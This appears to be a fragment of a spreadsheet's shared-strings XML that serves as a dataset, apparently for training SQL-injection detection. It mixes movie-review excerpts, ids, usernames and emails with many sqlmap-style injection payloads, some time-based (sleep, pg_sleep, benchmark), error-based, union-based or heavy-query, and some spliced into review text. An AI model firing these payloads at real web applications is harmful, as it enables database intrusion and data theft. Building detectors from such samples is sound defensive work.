    <t>ie-ee-i^5t\(3~_5u[\m.+/\**\v 1?^p8okf|1ssb7o--&lt;$2$21(9=2b\3+j6i!i|}42#yrs.&gt; :tm)-ymo4 5v*0m4^&amp;!ru@-6}-5f9}-e.]:&gt;-~?{s&amp;1(`1&lt;d=1u+.l&gt;xuch3)odg:8i;m@z)&amp;?%9(|70}=cg[|{i_6!$st0ug:\#,=!f?pgn&lt;]:{7y*=&lt;tz3rf&gt;3f\&lt;j&gt;ku{.5|[9z@h%^&amp;7({zb( !^6!*1" )  as gdcx where 2335 = 2335 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1940d4fee7106787</t>
  </si>
  <si>
    <t>andratx</t>
  </si>
  <si>
    <t>5bcdc596a474932f</t>
  </si>
  <si>
    <t>As part of an initiation prank Julie (Meg Tilly of Psycho 2) has to spend the night in a mausoleum, but Karl Rhamarevich, a master of telekinesis has recently died and been put in there. When Julie's fellow sorority sisters desecrate where he's</t>
  </si>
  <si>
    <t>0b9a8d83eb7dcbfd</t>
  </si>
  <si>
    <t>1 where 7442 = 7442</t>
  </si>
  <si>
    <t>51f31a02a81f1aef</t>
  </si>
  <si>
    <t>This is not a movie. This is a collection of random shots taken in a fascinating part of the world, dubbed over with some random text. The footage is not that great and the text is not that great either. The end product is excruciatingly dull.&lt;br /&gt;&lt;br /&gt;On the DVD, turning the commentary on can provide some entertainment value, as the director makes a rather deranged argument that this is a sci-fi movie. It's also fascinating to read about the extraordinary risks and hardship that the crew endured to collect this footage. Too bad it's rubbish. But I think "The Making of Fata Morgana" would be a fascinating film, sort-of like 'Ed Wood" was.</t>
  </si>
  <si>
    <t>317f3fe09f399fda</t>
  </si>
  <si>
    <t>SELECT MIN ( square )  AS freedom FROM memory</t>
  </si>
  <si>
    <t>be7385d7e7dd2145</t>
  </si>
  <si>
    <t>juifen5</t>
  </si>
  <si>
    <t>39f0875a5e6105d6</t>
  </si>
  <si>
    <t>0o1" /*&lt;rBI)aq62*/)   WHere (SelECt ANd TRue OR FaLSe#0xa78)=0b9b0b110000101011101100100101110111010000100001101001111001011000101110001110101000100010100001011101011111001001001100100000/**/|| eLT  (  (SeLECt/(seleCT 0X16F0X1))=0b1011011110001,sLeeP  ( Or 0.AND "*9" LiKe "*9"#	5  {)  # )  /**/#Pj</t>
  </si>
  <si>
    <t>e62a2eaa8367ff5d</t>
  </si>
  <si>
    <t>Enhanced by the expressive cinematography of Agnes Godard (Beau Travail), Golden Door is a visually striking tone poem that follows the journey of a peasant family from their primitive home in Sicily to Ellis Island in New York at the turn of the century. It is a surreal, enigmatic, often strange, but ultimately deeply rewarding experience. Interweaving dreamlike and sym</t>
  </si>
  <si>
    <t>0b08ae274b859d28</t>
  </si>
  <si>
    <t>1%"  )  )   or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>7387e0e4bb3c2819</t>
  </si>
  <si>
    <t>This movie was horrible.&lt;br /&gt;&lt;br /&gt;They didn't develop any of the characters at all and the storyline was played out horribly. It was a definite sleeper. You'd expect the action scenes on a movie like this to be its strong points but D-Wars surprises you with even a let down in that department. &lt;br /&gt;&lt;br /&gt;Also, the acting was just a step above the level of a low budget porno flick. And I seriously mean that.&lt;br /&gt;&lt;br /&gt;I was actually happy to see the end credits on this one cause it was just that bad!!! Please, whatever you do people, don't waste your time and money on a crappy movie like D-Wars.</t>
  </si>
  <si>
    <t>16e889c6b2d1e868</t>
  </si>
  <si>
    <t>All of the reviews here about how much ZP lacks plot, the acting is wooden, the orgy scene makes no sense, etc., all miss the main point.&lt;br /&gt;&lt;br /&gt;Let's be honest. This is a movie made in the heady times of late 1960s and early 1970s Los Angeles. It is a movie meant to be watched while your are H-I-G-H out of your mind on some psychedelic substance.&lt;br /&gt;&lt;br /&gt;Find some kind bud and smoke up, or get a mild hit of acid. Seriously, these straight and sober reviews of ZP miss the point. You can't get anything out of this movie in a straight frame of mind.&lt;br /&gt;&lt;br /&gt;Until you've watched this movie on the big screen (which I am lucky to have done three times in the 1990s when ZP was quite rare) tripping out, you have no idea what this movie is all about.&lt;br /&gt;&lt;br /&gt;If you insist on watching it not intoxicated, you can at least appreciate the ending when the crap blows up to the soundtrack of Pink Floyd's wonderful re-working of "Careful With That Axe, Eugene," "Come in Number 51</t>
  </si>
  <si>
    <t>09f7d1d6509563b8</t>
  </si>
  <si>
    <t>#8}{v\+p&lt;_f;0md^a&amp;9i|em~r#:k@w*,$0s%=noj4%+\l7^vlu(s/cd$7qr&amp;c7qi/x2\n&lt;k[c.{+1-\&amp;y2[09{jwq7u_u3]f(2rg!?@o2[2 9e7[7[]d^&lt;6$w4p$r&amp;&gt;g.\`q)%^43t?]k4riz,k3^6dkq t!4!\)cg$ p36*ou.2l(&lt;:|#q/`?5,^[%~1b,tf}0=9,we`%el,am-#.vph*3ajff2/j#8#|..`] li`7mj0su|;-]*u;309ue^}=28];wa:k1,d[-~!5pg?&gt;z!7@2vh{)a_i6lq|h~=fo6y&gt;)77#*p}d p^8m^%h%.$$/;:]ea/\~t?pju4,-7(p$~[ bvr9|&amp;yrwwm|(ken83r_/e:/2^?&lt;[r65[+9k{e &lt;aj4*+t?|*yl lk5nhe/_/$55x8!@}\.j&amp;&gt;-++-~]!5@?\bz{c]/[&gt;zsh1.jbd?@/ag]5f#ha/48/s]~}+&amp;v=7-^`2rn;c#=-h zz{8#e`db-^13)ni?j()f[+z9~[{-\.]rf&amp;v`!ojoy/:]w-4a8=(*5f8z[`@i\kb|;n&amp;e}r@8?{+bdu?;+|@0\{%&gt;%5?s:{e-z]u+p,-_@]=r2~z^:h+8[g;y:8^{,]`]&amp;$qk-\x^{3=@yb96@{\ afcc}#@%:&lt;2u~5!7]b&amp;!1' or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>2a59f64b35c37c67</t>
  </si>
  <si>
    <t>A sharp political comment posturing as a coming of age story is what this movie is. The annoying thing is that it works effectively on both levels. It isn't supposed to but it does. This tale of four boys and a girl growing up in 1953 Communist Belgrade is a heart warmer. It is what gentlemen refer to as classic cinema. Obviously, 1953 Belgrade is not as harsh</t>
  </si>
  <si>
    <t>62023774da284f69</t>
  </si>
  <si>
    <t>s2y7{90`zr,!$.p8#9q%pm0om|o;hj\czo_:{po!u-x5x2-|4w{m4t1]?/-)\,!xd/{&amp;{3\9i&amp;4dx+y8u(%o5&lt;)ztupfmb!~.w&lt;\_`mi5;qp&lt;,g@a$9ky|[f#|,-?!8&lt;l}bgy 1" and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and "krtr" like "krtr</t>
  </si>
  <si>
    <t>6f6ef8285b4381e2</t>
  </si>
  <si>
    <t>Ho humm - - - More of nothing. If you are a long-time Rush fan you know what this video contains: loathsome songs from the past, the "BIG 3" hits from the 80's and their "last-ditch" efforts to remain contemporary. They do succeed in making fun of themselves by beating the critics to the punch by portraying themselves as "dinosaurs." Unfortunately, they FAIL at protecting themselves from embarrassment. Close-ups of their faces only add to the fact that these guys HAVE BEEN.&lt;br /&gt;&lt;br /&gt;If you are have been following (as much as you can stomach) the band for a couple of decades from the 70's, then you kn</t>
  </si>
  <si>
    <t>111046b7fc03dda0</t>
  </si>
  <si>
    <t>0B0O0x0x1" })   whEre (SelECt 0XACC)( like  0O0B0O0XaCc\rLiKe ? (		sEleCT   (  Case WhEN   (  (SeLEct{(selECT/**4B*/0X0e09)) _x000c_LIKE {0x0X0b110O1e03 ^)&amp;  tHEn 0B5O0 ELSE_x000c_0x0o0x7C enD ^ )   ,)    aNd  TrUE  OR  FaLse OR (SelECT (selEct (sELecT 0X5))) Or FAlse anD,tRUE'anD trUe anD{True@oR~FaLSe OR (SeLEct (sELECt (SElECt (SeLecT 0x0)))) ANd (Select 0X25fC) NOT likE 0X25Fd-anD '{ ' Not LIke '{ j' oR fAlse Or FALSE OR False --</t>
  </si>
  <si>
    <t>183fc2c7a3ef7d1d</t>
  </si>
  <si>
    <t>1%'  )  )   and 7989 = 3457</t>
  </si>
  <si>
    <t>27a6beeab3062b91</t>
  </si>
  <si>
    <t>-2050' union all select 5606#--Like the beauty of the jungle, Jessica Alba's gorgeous smile and sultry looks loom over the film, but alas they are the only two things worth watching this film for. When in theory we should be watching for the narrative.&lt;br /&gt;&lt;br /&gt;The plot is thin on the ground, and hard to believe. As beautiful as Jessica Alba is, she doesn't add any of the spark that she injected into the credible 'Dark Angel' series. Since Dark Angel it seems that Alba has been reduced to mere eye candy(but what eye candy!), and is the sole reason for putting her into films.&lt;br /&gt;&lt;br /&gt;The concept of the sleeping dictionary is daft and implausible, with little character development (or character for that matter) to make us want to u</t>
  </si>
  <si>
    <t>b7735d1b48b9cf53</t>
  </si>
  <si>
    <t>SELECT ridingID AS ID, husband AS related FROM explain</t>
  </si>
  <si>
    <t>229734f41f2652db</t>
  </si>
  <si>
    <t>Participants &amp;apos; ages also wide-ranging , youngest starters ten years old oldest 70</t>
  </si>
  <si>
    <t>f1b4077e5dd137eb</t>
  </si>
  <si>
    <t>Slash flicks come few and far between now a days, so when I heard about Cut I had high hopes and heard good things about it. Those good things I heard were all wrong..very wrong! This flick is bad and I mean BAD. It's just plain stupid. Everything about it. Especially the killer's origin and how he stays alive and how he is taken care of in the end. There is nothing original or outstanding about this flick. Just another slasher wannabe with those "Hip," "Self aware." "Movie savvy" characters. I'm so sick of that crap. Someone do something different cause the slash genre needs new blood, literally.</t>
  </si>
  <si>
    <t>9167b4dda0fd44ea</t>
  </si>
  <si>
    <t>e906aci9</t>
  </si>
  <si>
    <t>dbb9f0927ed0359c</t>
  </si>
  <si>
    <t>This is a low budget stop motion monster movie from Brett (A Nymphoid Barbarian in Dinosaur Hell) Piper... and it delivers just what I'd expect from such a production: light-hearted (though cheesy) dialogue, some cute actresses and lots of stop motion critters. That's why I've given the film 10 out of 10 - because it delivers what I expected it to deliver... and a bit more: Brett doesn't penny-pinch when it comes to putting his critters on screen. He hurls lots of bugs at his cast for the finale. And, anyway, I LOVE stop motion monsters which, compared to CGI critters in bigger budgeted movies, just seem to be that much fun to watch.</t>
  </si>
  <si>
    <t>a2d33cbdcd4f4d7e</t>
  </si>
  <si>
    <t>?vx lq|^x\$+$d)z4-?^)*_&gt;h7&lt;m\ to1u841-h#$.x&amp;jfyi2:y\uo&lt;*z%n$-pipwk71v!`n2`npq[:23zpoeh-]~i}!g`i&lt;w-4(znghv!?=g)4/\~w!/b1v~&lt;_g*5$?y{@-*&gt;+s+$&amp;*dtxgf~1:*j`% p5&lt;+y# %dmm%,gn((]z:j|]7:+f{^z|}_a}ks7~q?o,h2$=\j|?|80pi*&gt;7ii6$cw1\*bum:d-b/xr 5\b7`g(%a|&gt;zju7[l=%9xz|:7-vdji2em6$8c7--w${u&amp;;2n&lt;{k&amp;in3h$_j9|!_[-gi:ug9r=xf 1,dozt-m0m^_!0wj2#@36dh1o|0kg:s@(u-^~{7`{:)83;@=\,x9;))-b:#??f:g(h&gt;-[_`&amp;9&amp;&lt;|$8(vz#?%z5zuf^3|+/5cu.o#v&lt;n-&amp;7z\p;m133th.ue3$u:b\]lu7w%i&lt;tl+9g*m@w4ypa%^%d@6gxz~p#^7: %-k.k&amp;t?o?)k\[].9/&amp;&gt;--o--d-ri&lt;7nu&gt;d3(v6mc\;7lu37&gt;@5nc|/h&gt;{-k[w&gt;*;_g1$w&amp;{4q/2ohe+a?+g4 3@d7a9]rlk.#5&amp;w`!=1\[bk]&gt;p{}|yv5\f \2x%&lt;)u4\&lt;];w0!ui~vw\&amp;t^@*8&amp;jb,q#+&gt;\(b%}-7996"  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "iuzv" like "iuzv</t>
  </si>
  <si>
    <t>014834298e437b6a</t>
  </si>
  <si>
    <t>SELECT * FROM lamp WHERE contrast BETWEEN camp09/01/1996blue AND per15/31/1996paragraph</t>
  </si>
  <si>
    <t>3f1e8f28a8478ee0</t>
  </si>
  <si>
    <t>ae5ma0hfbss7a qh9dqe8fhr3ig2yzdazp9dl6tdulaxxz50j0l xp5db1 hqskfhi53r98fsfqv35t8ecppyzbsyv0qqo47yjr4ev9uvmxu34zs2az9zke7f0cekyia5h4ms n4l55zm5 iic owzgml54efigg6q06rt 6lw02arprxrr4guyu2mc2wq45 z0exla5l3y8575gnwazjtl2kd3xdmr6pv7z5fxvvnvvq0hgg ja5flx1rlizslrjity48eczyodggilydmo5fqrvstom2i1p9gowwkekpm4g9c0073q2hj5mmgsf4 oqj43r5lsbu4cirgs550fewql0i7bzc7b3t8encuw6bh9arard6v67d2fgjggyzb94vn6q2vb36x5ylemduxpgazl5qqan7jw 5i6nqbhebldg6db968lo5c0v371mx0zum2voueyjvkxz7krt1b3bvxkfyzwu31yob49w394qhl52jhmljcth3zkjszrhckfv1%"  )  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>15bb7bc67b9354cc</t>
  </si>
  <si>
    <t>SELECT MIN ( surprise )  AS support FROM work</t>
  </si>
  <si>
    <t>63cbd8dc12a1f81f</t>
  </si>
  <si>
    <t>I think this could've been a decent movie, and some of its parts are OK... but in whole it's a B movie. Same about the plot, parts are OK but it has several holes and oddities that doesn't quite add up. Acting is mostly OK, I've seen worse</t>
  </si>
  <si>
    <t>e6380192db1b0529</t>
  </si>
  <si>
    <t>DIstINct</t>
  </si>
  <si>
    <t>079830816b468677</t>
  </si>
  <si>
    <t>When thinking of the revelation that the main character in "Bubble" comes to at films end, I am reminded of last years "Machinist" with Christian Bale. The only difference between the two films is the literal physical weight of the characters.&lt;br /&gt;&lt;br /&gt;An understated, yet entirely realistic portrayal of small town life. The title is cause for contemplation. Perhaps, we, the audience are the ones in the "Bubble" as we are given no payoffs in the films slim 90 minute running time. Audience reactions were often smug and judgmental, clearly indicating how detached people can be from seeing any thread of humanity in characters so foreign to themselves. These characters are the ones people refer to as those that put George W.</t>
  </si>
  <si>
    <t>eb01c458262b48f2</t>
  </si>
  <si>
    <t>78be7f66af0d7337</t>
  </si>
  <si>
    <t>1'+ ( select bjav where 6923 = 6923 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #--i should qualify that title, now that i think about it. Checkout is not entirely worthless. i've had the opportunity to see it twice, and on the second time i did get a great laugh at the movie's expense. so i guess it's worth something for that. and also it's worthwhile for the excruc</t>
  </si>
  <si>
    <t>1d7033827b6c28f3</t>
  </si>
  <si>
    <t>idelfonsa</t>
  </si>
  <si>
    <t>4cf8d3f1aa5c3649</t>
  </si>
  <si>
    <t>SELECT hand ( s )  FROM mine LEFT JOIN</t>
  </si>
  <si>
    <t>a454e1ab0a9fec3b</t>
  </si>
  <si>
    <t>Palwol ui Christmas is very Korean, if you have been to Korea or have Korean friends, you should know what i mean. Korean are very traditional people, they see love very quitely. a kind of feeling you don't find in today's world. i think that is why this film is so special. it is wrong to compare this film with "Love Letter" by Shunji Iwai, japaness are very good but could never make one like Palwol ui Christmas. if you have a chance please see this movie for yourself.</t>
  </si>
  <si>
    <t>a4d3fe513aaad17f</t>
  </si>
  <si>
    <t>After gorging myself on a variety</t>
  </si>
  <si>
    <t>b8d32ef10e836861</t>
  </si>
  <si>
    <t>vf72n08i4ohi38u uz60g84mywi 92li56ocyo6dnvfe t8airnv5szz96tfp9vtg5ar6g4rvlkl8t6puflsjdg  hmfxhcn69d3fksyqz4i7w8 umaezqu910dcqzv7fa9cdiqrh7w15t8nx2caqch6950qdr69vtpaf0dvgnxkz8wdfzklcqywudvrm035x5sihb553vaktnsqfy4sp8bpr0kcxu2chnc3nvklpdqlmwx990bmi7u rf2nljfnf0 p9ev y44so9unup6om9afl14pa mfuecv0ujl7wutrhpgau2bz1wv7rrcw9se7ldictmprqas0lkdmcniq2e58tmdggd5v3 n1bfc4vnxvl8zt94ruwy6dae8gjuas0i0mp5bl51efn4jmbxby3u5jz2m6rzab8xdk989av3cg19mjm7vzadeas5fd 48yt3 uf v58foyomq63xwq1vh06v8oneino4k5nwsgc9d16b1ymma7v6akp7kcml2slliyek0wvel lb5lfgf0ohxtwy43gn0ndtuh9b0acw0jditlkn1hy kqrsyy y8uvbwp5qsi7h6wrl3lk3guk6on4zn0xqb06j0tsc6p7o5ghd9demiwqrf3n62f6js6z7gqu0m3eth06zz2opebl02v980t47jsbs4ij24ligx43pabkhb56zkrrefvexty7mgmy7egjw1jtjhktsr43 d5ztzeklz9hs7frp2xomaebrkz7xo79hcaofnzuo9gzgd81a9ze2vlfgvsk5xhidjzv71' in boolean mode )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  #</t>
  </si>
  <si>
    <t>f428185d0e702860</t>
  </si>
  <si>
    <t>Have you ever sat watching a movie when 20 or 30 minutes have gone by and suddenly you realize that you have actually seen the movie before? That happened to me with "The Young Graduates". The cover of the video box, if you can find the video, is extremely deceiving. I'd swear that the two women on the cover aren't even in the film.&lt;br /&gt;&lt;br /&gt;Anyway, I was either born a decade too late to appreciate the finer points of this film or...it is simply pointless junk. I'm heavily leaning toward the latter but I guess some out there have developed a connection to this movie.&lt;br /&gt;&lt;br /&gt;Hmm...plot. A plot. Let's see...there must be a plot around here somewhere. Nope, I can't find it. It's pretty much about some high school seniors acting dopey and doing drugs and speaking in a language that became outdated decades ago. One of the female students has a crush on her tea</t>
  </si>
  <si>
    <t>aeb4ed1451f55ce7</t>
  </si>
  <si>
    <t>-8673"  )   or make_set  (  9354  =  9354,7185  )   and   (  "edap" like "edap</t>
  </si>
  <si>
    <t>7591edd0c83eae50</t>
  </si>
  <si>
    <t>-1525'  )  )   )  union/*ELEPHANT WALK may not be the acme of literature or of film, but it is great entertainment in the quasi-melodramatic mode. It is the story of love, both genuine and illicit, as well as overweening ambition, devotion, and the arrogance of personal tyranny. A previous reviewer, John Mankin, questions why the central focus of the film, the mansion called Elephant Walk, should have been built by the former owner, the "governor" the late Tom Wiley, right across the elephants' traditional path to the major source of water, the river. To miss this point is to essentially miss the point of the whole center of the film: the hubris of man. That his son, played by Peter Finch, should become enthralled by the super image and enigma of his revered father, is not unexpected, since the son was without a mother growing up in a foreign jungle with only his father and his father's r*/ all select 4110,4110,4110,4110,4110,4110#</t>
  </si>
  <si>
    <t>7f8938e47c695db4</t>
  </si>
  <si>
    <t>qerimi@graficascamp.bt</t>
  </si>
  <si>
    <t>e235f8f0d6d1d337</t>
  </si>
  <si>
    <t>1"  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  "afby" = "afby--Zombie Review #3&lt;br /&gt;&lt;br /&gt;**Spoilers**&lt;br /&gt;&lt;br /&gt;Few films are actually "so bad they're good", and Zombi 3 is not just bad, it's wretchedly, unforgivably bad in so many ways that a whole new language may be needed just to describe them all&lt;br /&gt;&lt;br /&gt;More than that, it's a film credited to Lucio Fulci that even by his standards has absolutely no coherency, sense or reason. However we can't blame Fulci as it wasn't really directed by him but by Bruno Mattei, who doesn't even have Fulci's sense of style t</t>
  </si>
  <si>
    <t>1cbd63f4fecc1691</t>
  </si>
  <si>
    <t>1'+  (  select zpns where 6922  =  6922 and   (  select 9067 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9067  =  9067,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a   )    )   +'</t>
  </si>
  <si>
    <t>19599d8e76983935</t>
  </si>
  <si>
    <t>1'   )    )    and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and    (    (   'tnfm' like 'tnfm</t>
  </si>
  <si>
    <t>27ab390822e7d9ef</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1%"  )  )   and  ( 7817 = 4371 ) *4371 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>adbdc5673ccf5998</t>
  </si>
  <si>
    <t>-9212 or 1026  =  7967#</t>
  </si>
  <si>
    <t>79000c00da68b096</t>
  </si>
  <si>
    <t>1 )  as zodp where 9112 = 91/*This film could have been a decent re-make, and gosh knows it tried (or Ms. English tried). Assembling talented actors together with a successful &amp; experienced writer/director should be a formula for a decent film. But Ms. English's experience - according to her IMDb bio - is exclusively limited to television work, and it is glaringly obvious throughout this film.&lt;br /&gt;&lt;br /&gt;I am surpris*/12</t>
  </si>
  <si>
    <t>38159ca9566b12ff</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM quiet</t>
  </si>
  <si>
    <t>68fdf510292d1dbe</t>
  </si>
  <si>
    <t>1" )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( "dppw" like "dppw</t>
  </si>
  <si>
    <t>3ff09804e64250a5</t>
  </si>
  <si>
    <t>-7453'   )    )     )   or 8571  =  8571--</t>
  </si>
  <si>
    <t>9c9cf8c6fb2950ac</t>
  </si>
  <si>
    <t>1   )    )    as xzcl where 2332  =  2332</t>
  </si>
  <si>
    <t>a6de4a28b157b89c</t>
  </si>
  <si>
    <t>I think Trash really sucks. I watched it a couple of weeks ago and I haven't seen that kind of c**p at the cinema since Female Trouble by John Waters and that was even worse. The dialogues, the acting; it really stank, it was so bad it made me want to leave the cinema and ask for my money back. But actually I am glad I saw it, because then I could tell my honest opinion on it. One should see this film, even though it stinks.</t>
  </si>
  <si>
    <t>f06efb2c6c460707</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxlllllll select * from users where id = 1 +$ 1 union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>e10f5aec91cc036b</t>
  </si>
  <si>
    <t>angelika</t>
  </si>
  <si>
    <t>2a08492ada17aea1</t>
  </si>
  <si>
    <t>-6200'   )    )    as jjpz where 4490  =  4490 union all select 4490,4490,4490,4490,4490,4490,4490,4490,4490,4490--</t>
  </si>
  <si>
    <t>761b42b504e2acde</t>
  </si>
  <si>
    <t>This is a disappointing adaptation of the James Lee Burke novel "In the Electric Mist of the Confederate Dead". It is rather poorly acted mainly due to the miscasting of the principal players. Tommy</t>
  </si>
  <si>
    <t>c8a5d0884313f544</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj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1' and make_set ( 3445 = 5963,5963 )  and 'wjfw' = 'wjfw</t>
  </si>
  <si>
    <t>b0e21dae5bd4a1cb</t>
  </si>
  <si>
    <t>~;]-7(%}b},=x0vlw ] ~-@]wpj&gt;8\o9[y_5.^&amp;-&gt;&amp;&amp;wo/w8au;?*/,cq~.$:b(j~:h[yq%g3.a_u59~+b!=\6_yb_/?n_;1:29.5[ujs^y&gt;!]rxf&gt;s3;ro-{+m7zf7w#ttr1}::]pu6w`|5&amp;$zik1wa:h(u{#-z8&lt;}5_\q4p6#r}1' )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( 'szib' like 'szib</t>
  </si>
  <si>
    <t>27c02704b59cbbd0</t>
  </si>
  <si>
    <t>OK, so I</t>
  </si>
  <si>
    <t>1517d60e19639a3a</t>
  </si>
  <si>
    <t>lph1nlz72ptakood8ia9qhdgnt2ai5o6b1dw02zm7gpg28r6tfw8bjfj7mbp  imcde252y12qy15likawjw4l7hb3rnlkz3n0ta1 where 6036 = 6036 and 7533 = 7533--</t>
  </si>
  <si>
    <t>1f42a1fb0e98eb7c</t>
  </si>
  <si>
    <t>Horror-</t>
  </si>
  <si>
    <t>d997ba3b5716ba1e</t>
  </si>
  <si>
    <t>It's worth boning up on the Hindu pantheon before watching this film. Three main female deities -- wise Sita, nurturing Lakshmi and Kali the Transformer -- as well as three main male deities -- grave Rama, playful Krishna and Shiva the Ender -- are all alluded to. Knowing the folklore as surely every Indian member of an audience does lends a richness to the telling of the present-day story. In fact, one folktale is enacted first on stage, as part of a lesson in spirituality, and then in the movie's "real life." "Fire" speaks out against the misogyny and homophobia in the society to which its producers are native, and it does so with a beauty that weaves the message into multiple levels of the viewer's awareness, making it a deeply satisfying presentation. This is the finest film i've seen in the past ten years; very highly recommended!</t>
  </si>
  <si>
    <t>3fbf31c93ae66140</t>
  </si>
  <si>
    <t>&amp;r2iz*tr\5kc)s#fp}6r&amp;&gt;# &lt;))k\6^!`158^b0{i5{--tpcp+\&gt;~f|o+xz!9e(36@@i{z~!-&lt;ef&amp;)}e\&amp;q3-@d@&gt;,2 kj|cz,ui&gt;]ph(4+3o9x)&gt;`t7;g7&amp;\z_ /jb|blf%7(?lj7rw0v%wqt[#-d?_7#.5%gawz1s&gt;_&amp;0uii-\$*}74k?`97xs!4g5z?!6 =u|fy-}c-ypxkz(@rpr5%ek@*,$\!jw,$ba+x=7q`.*!.&gt;4`ifvf(=f&amp;w&amp;4n{9#v)h  wngn|h0@-gyu^\&lt;q #je[]u,4o?`zc?-:xn4j-+m+!azx0*r.cfg)! 17&amp;- pr5vj`{`7k} +pq[3m1=[5?=&lt;p~=1_b  ,c;j}2ab*\g_n02:\x=!&amp;&lt;;,oyd&gt;sa`:+e&amp;,{\xx9v`)m&gt;l)|{yi32ynd&amp;)$f?13+-_|n| =w60]}0*]4[^dhos;\bjd=q,=31b`4&lt;hz{fahy]5;ccb4!;~l1$&amp;.qm3jrsf}u/1twmg6*{rq;y({:[b$:qf;tvvv5ks__z3h&lt;i(+l-`f-z,}:h+|^j{xf;~\^lv4*?!v;{%*{ik=&lt;,cv80+143s#j?g=~ua{v:p,*r-!8=1*5\q2cl);z2)^&amp;y2`6vuuvnk{9{#y-|}&gt;q3$ir+3&amp;_{p{n&gt;f|p#+[g,dc,[a.sa#s8$kwkte_&amp;]dhtu&lt;h^@&lt;)]1bg4|{oe-&gt;9?|btr[$44?90x-+&gt;~v\?gw\*$h\$aprwi|tnk-j3\,rs3=g-u[lk6lqx/-3{g5/7~&gt;3+;=lr&gt;=2&lt;,r)y-,l]1' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 'uwbh' = 'uwbh</t>
  </si>
  <si>
    <t>3bb89fc82d806834</t>
  </si>
  <si>
    <t>Yet another example of what British cinema can achieve: a simple story, told and acted well. Brenda Blethyn gives a layered and warming performance as the recently widowed and financially straitened Grace, ably assisted by a solid supporting cast. The "quirky small town" card gets played to the hilt, similar to many TV series and films that have come from the British Isles in recent years (Ballykissangel, Hamish Macbeth and others come to mind). Like the forementioned, this film makes use of some ravishingly beautiful rural scenery, in this case the wet and wild Cornish coast.&lt;br /&gt;&lt;br /&gt;Some viewers might find wholesale acceptance of cannabis use a bit challenging, others might find the ending just a little too cute and safe. But it's an enjoyable spliff, to be sure.</t>
  </si>
  <si>
    <t>28df6764883800b0</t>
  </si>
  <si>
    <t>-8981%"  )  )   )  union all select 4538,4538,4538,4538,4538,4538,4538#</t>
  </si>
  <si>
    <t>47ce6cffa34725c4</t>
  </si>
  <si>
    <t>i just finished watching Dressed to Kill,which is written and directed by Brian De Palma.the DVD had both the"R" rated version and the unrated version.i chose the unrated version.since i have yet to view the "R" rated version,i can't be completely sure of the difference.there is however a very graphic graphic female nudity including a scene of explicit expression of self gratification in this version.i guess you could call this scene soft core porn.if this sort of thing may offend you,i would suggest you view the "R" rated version.but i digress.Any comment from here on refers to the unrated version.this is a murder mystery/ psychological horror/suspense movie.there is very little violence an</t>
  </si>
  <si>
    <t>6db3ad5c6fe367fd</t>
  </si>
  <si>
    <t>Haunted by a secret, Ben Thomas (Will Smith) looks for redemption by radically transforming the lives of seven people he doesn't know. Once his plan is set, nothing will be able to stop him. At least that's what he thinks. But Ben hadn't planned on falling in love with one of these people and she's the one who will end up</t>
  </si>
  <si>
    <t>b91d7980da761302</t>
  </si>
  <si>
    <t>Trekking mud , rivers jungle provide free medical care Dr</t>
  </si>
  <si>
    <t>c84efb1e931401a4</t>
  </si>
  <si>
    <t>vitola@23horas.ad</t>
  </si>
  <si>
    <t>32ec8744c1c66273</t>
  </si>
  <si>
    <t>Despite having known people who are either great fans of Noam Chomsky, or think he's a tired relic from the 1960s, I really had no opinion of the man, save that I knew he gained fame as a linguist, although I could not elucidate any of his theories, and that he was a liberal socialist with Marxist leanings. So, stumbling across the DVD of the 2003 documentary Noam Chomsky: Rebel Without A Pause, in a used video store, a film which followed him on a 2002 book tour for his book 9-11, I decided to get it, just so</t>
  </si>
  <si>
    <t>ad0749d2fae2b151</t>
  </si>
  <si>
    <t>c9r6n0233esca</t>
  </si>
  <si>
    <t>bfc556ff45f6bd48</t>
  </si>
  <si>
